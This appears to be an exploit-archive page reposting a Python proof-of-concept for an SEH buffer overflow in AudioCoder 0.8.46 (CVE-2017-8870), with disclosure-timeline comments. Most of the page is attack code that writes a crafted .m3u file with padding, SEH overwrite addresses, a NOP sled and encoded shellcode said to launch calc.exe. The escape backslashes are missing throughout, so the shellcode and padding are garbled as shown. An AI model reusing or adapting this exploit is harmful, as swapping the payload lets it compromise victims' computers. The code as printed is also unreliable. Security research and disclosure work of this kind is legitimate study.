Home / os / winmobile

AudioCoder 0.8.46 Local Buffer Overflow

Posted on 01 August 2017

#!/usr/bin/python
# Exploit Title : AudioCoder 0.8.46 Local Buffer Overflow (SEH)
# CVE : CVE-2017-8870
# Exploit Author : Muhann4d @0xSecured
# Vendor Homepage : http://www.mediacoderhq.com
# Vulnerable Software: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=AudioCoder-0.8.46.exe
# Vulnerable Version : 0.8.46
# Fixed version : N/A
# Category : Local Buffer Overflow
# Tested on OS : Windows 7 Pro SP1 32bit
# How to : Open AudioCoder then drag & drop the .m3u file in it and then press the START button.
# Timeline :
# 2017-05-05: Vulnerability discovered, vendor has been contaced
# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version"
# 2017-05-09: A POC sent to the vendor. No reply since then.
# 2017-06-26: Exploit released.

print "AudioCoder 0.8.46 Local Buffer Overflow By Muhann4d @0xSecured"
from struct import pack

junk = "http://" + "x41" * 741
nseh = pack('<I',0x909006eb)
seh = pack('<I',0x66015926)
nops= "x90" * 20
shell=("xb8x9dx01x15xd1xdaxd2xd9x74x24xf4x5ax31xc9xb1"
"x32x31x42x12x03x42x12x83x77xfdxf7x24x7bx16x7e"
"xc6x83xe7xe1x4ex66xd6x33x34xe3x4bx84x3exa1x67"
"x6fx12x51xf3x1dxbbx56xb4xa8x9dx59x45x1dx22x35"
"x85x3fxdex47xdax9fxdfx88x2fxe1x18xf4xc0xb3xf1"
"x73x72x24x75xc1x4fx45x59x4exefx3dxdcx90x84xf7"
"xdfxc0x35x83xa8xf8x3excbx08xf9x93x0fx74xb0x98"
"xe4x0ex43x49x35xeex72xb5x9axd1xbbx38xe2x16x7b"
"xa3x91x6cx78x5exa2xb6x03x84x27x2bxa3x4fx9fx8f"
"x52x83x46x5bx58x68x0cx03x7cx6fxc1x3fx78xe4xe4"
"xefx09xbexc2x2bx52x64x6ax6dx3excbx93x6dxe6xb4"
"x31xe5x04xa0x40xa4x42x37xc0xd2x2bx37xdaxdcx1b"
"x50xebx57xf4x27xf4xbdxb1xd8xbex9cx93x70x67x75"
"xa6x1cx98xa3xe4x18x1bx46x94xdex03x23x91x9bx83"
"xdfxebxb4x61xe0x58xb4xa3x83x3fx26x2fx44")
#calc.exe

junkD = "D" * (2572 - (len(junk + nseh + seh + nops + shell)))
exploit = junk + nseh + seh + nops + shell + junkD

try:
file= open("Exploit.m3u",'w')
file.write(exploit)
file.close()
raw_input("
Exploit has been created!
")
except:
print "There has been an Error"

 

TOP

Malware :

Exploits :